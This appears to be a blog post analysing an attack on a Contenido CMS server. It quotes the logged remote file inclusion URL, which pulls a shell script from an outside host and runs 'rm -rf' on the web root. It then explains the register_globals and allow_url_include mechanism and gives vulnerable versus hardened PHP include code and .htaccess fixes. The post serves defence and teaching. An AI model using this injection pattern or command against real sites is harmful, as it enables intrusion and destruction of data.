Contenido Code Injection
Yesterday one of our customers' servers was attacked. The whole Contenido installation and all other directories were deleted. After checking the Apache logs it was obvious what had happened:
The IP address 201.19.76.194 started several attacks between 0:55 and 1:00 o'clock. The attacker used a TembeddedWB-based browser and tried to inject code into the Contenido class /contenido/classes/class.inuse.php. The code injected was http://www.tritonsdr2.by.ru/cmd.txt, a script that reports versions and paths to the attacker and gives him a shell. At 0:56 the injection was successful and Apache returned status 200 for the attack request. After this the website was completely gone. Fortunately the database stayed untouched.
In detail, the full URL used was:
/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.tritonsdr2.by.ru/cmd.txt?&cmd=cd%20/data/export/http/WEB_DIR/http;rm%20-rf%20index.html;%20rm%20-rf%20index.*
This manipulated the Contenido variable
$cfg[path][contenido]
in such a way that class.inuse.php included and ran the remote file on the machine. This is a remote file inclusion: PHP's include() will fetch an http:// URL when the installation permits it (allow_url_fopen on old PHP versions, allow_url_include on PHP 5.2 and later), and the trailing "?" in the injected value turns whatever file name the script appends to the path into a harmless query string, so the URL still resolves to cmd.txt. For a query-string parameter to land in $cfg at all, request data has to be copied into that variable; on PHP installations of that time this usually happened through register_globals. The included code then executed the cmd parameter, which decodes to
cd /data/export/http/WEB_DIR/http; rm -rf index.html; rm -rf index.*
and deleted the index documents. This security hole has already been reported and fixed. The fix from the Contenido developers is:
<?php
// Refuse any request that carries a "cfg" parameter, so it can no longer
// overwrite $cfg through the query string or a POST body.
if ($_GET["cfg"] || $_POST["cfg"])
{
    die();
}
This is not a bad solution, but rather a workaround: it blocks one parameter name, while the underlying pattern stays in place (note that it also does not look at cookies, and the mass-assignment of request data into $cfg is untouched). Code injection is possible wherever files are included, or expressions are evaluated, based on variables that can be manipulated from the request without the code taking care of such manipulation. So nearly every big system can have potential security holes like this. On the PHP side, register_globals should be off, so that request parameters cannot silently become PHP variables, and remote includes should be disabled (allow_url_include=Off, and allow_url_fopen=Off where the application does not need it); then an include() of an http:// URL fails even if the application is vulnerable.
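To make the pattern concrete, here is an added example written for this post (it is not Contenido's own code): the include-by-variable construct the attack relied on, beside a hardened version, plus the in-code guard that complements the .htaccess protection described below. CON_BASE, APP_ENTRY, the allowlist entries and the install path are illustrative assumptions, and the code assumes PHP 7 or later for the scalar type hints.

```php
<?php
// Added example for this post, not Contenido's own code. CON_BASE, APP_ENTRY,
// the allowlist entries and the paths are illustrative assumptions.

// --- The vulnerable pattern ---------------------------------------------
// $cfg comes from wherever the application builds it. If request data is ever
// copied into it (register_globals did exactly that), a request such as
//   ?cfg[path][contenido]=http://attacker.example/cmd.txt?
// turns the include target into a URL. The trailing '?' pushes the appended
// "classes/class.foo.php" into the query string, so the URL still resolves and
// PHP fetches and executes the remote file (allow_url_include / allow_url_fopen
// permitting).
function vulnerable_include(array $cfg): void
{
    include($cfg['path']['contenido'] . 'classes/class.foo.php');
}

// --- The hardened pattern -----------------------------------------------
// 1. The base directory is a constant set by the application, never request
//    data, and it is an absolute local path.
// 2. Only file names from a fixed allowlist may be included.
// 3. realpath() resolves symlinks and "../", and the prefix check proves the
//    result still lies under CON_BASE.
define('CON_BASE', '/var/www/contenido/');           // assumed install path

function safe_include(string $name): bool
{
    static $allowed = ['class.inuse.php', 'class.template.php']; // illustrative
    if (!in_array($name, $allowed, true)) {
        return false;
    }
    $path = realpath(CON_BASE . 'classes/' . $name);
    if ($path === false || strpos($path, CON_BASE) !== 0) {
        return false;
    }
    require_once $path;
    return true;
}

// --- Defence in depth on the PHP side ------------------------------------
// Report whether this PHP build would fetch a URL on include() at all.
// allow_url_include exists since PHP 5.2; on older versions ini_get() returns
// false for it and allow_url_fopen alone controls remote includes.
function remote_include_enabled(): bool
{
    if (ini_get('allow_url_include') !== false) {
        return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
    }
    return filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
}

// --- Guard for include-only files ----------------------------------------
// Call refuse_direct_request() as the first statement of every file that must
// never be requested directly. The front controller defines APP_ENTRY before
// including anything; a direct browser request to the file never sees the
// constant and gets a 403. This is the in-code complement to the .htaccess
// rule described below, and it still works if AllowOverride is turned off.
function refuse_direct_request(): void
{
    if (!defined('APP_ENTRY')) {
        header('HTTP/1.1 403 Forbidden');
        exit;
    }
}
```

The important difference between the two include functions is not the allowlist alone but where the base path comes from: in the hardened form no part of the file name that reaches include() originates in the request, so there is nothing for a cfg[...] parameter to overwrite.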
The best design is to separate the PHP that is run by the browser from the PHP that is only ever included, and to protect the include-only directory with .htaccess. The .htaccess file is rather simple:
Options None
Order allow,deny
Deny from all
This denies access to anyone coming with a browser; the files can still be included by scripts on the server, because include() reads them from the file system and never passes through Apache's access control. Two caveats: the file only takes effect if AllowOverride permits the Limit and Options directives for that directory, and the syntax above is Apache 2.2; Apache 2.4 expresses the same rule as "Require all denied".
related:
Contenido
Apache
TembeddedWB
Security Hole Report
Contenido Fix (german)

